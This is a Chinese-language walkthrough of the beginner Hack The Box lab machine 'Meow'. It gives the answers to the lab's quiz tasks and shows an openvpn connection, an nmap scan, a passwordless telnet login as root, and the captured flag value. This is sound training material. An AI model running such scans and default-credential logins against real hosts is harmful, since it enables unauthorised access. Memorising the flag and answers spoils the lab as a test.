声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

TASK 1

问：首字母缩略词 VM 代表什么？
答：Virtual Machine

TASK 2

问：我们使用什么工具与操作系统交互，以便通过命令行发出命令，例如启动VPN连接的命令？它也被称为控制台或外壳。
答：terminal

TASK 3

问：我们使用什么服务将 VPN 连接形成到 HTB 实验室？
答：openvpn

TASK 4

问：VPN启动序列输出中“隧道接口”的缩写名称是什么（网卡）？
答：tun

TASK 5

问：我们使用什么工具来测试与ICMP回显请求目标的连接？
答：ping

TASK 6

问：在目标上查找开放端口的最常用工具的名称是什么？
答：nmap

TASK 7

问：在扫描期间，我们在端口23/tcp上识别什么服务？
答：telnet

TASK 8

问：什么用户名可以使用空白密码通过telnet登录到目标？
答：root

SUBMIT FLAG

问：Submit root flag
答：

# P.S.管理员权限连接公开 hackthebox VPN
kali@kali:~/Test$ sudo openvpn starting-point.ovpn
# P.S.-sC 采用默认脚本扫描。
# P.S.-sV 扫描端口开放与服务版本情况。
# P.S.-Pn 跳过主机发现。
# P.S.-T4 扫描速度为阶段4
kali@kali:~/Test$ nmap -T4 -sC -sV -Pn 10.129.165.225
# P.S.机子：Linux
# P.S.开放端口：23/tcp，对应telnet 服务
# P.S.telnet 登录远程主机和管理(测试ip端口是否连通)
# P.S.telnet 10.129.165.225 -lroot 提前配置好账号
kali@kali:~/Test$ telnet 10.129.165.225
Trying 10.129.165.225...
……
# P.S.输入 root 用户名以尝试免密登录
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
……
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19

P.S.nmap 扫描，23 端口开放，尝试 root 用户免密登录 telnet。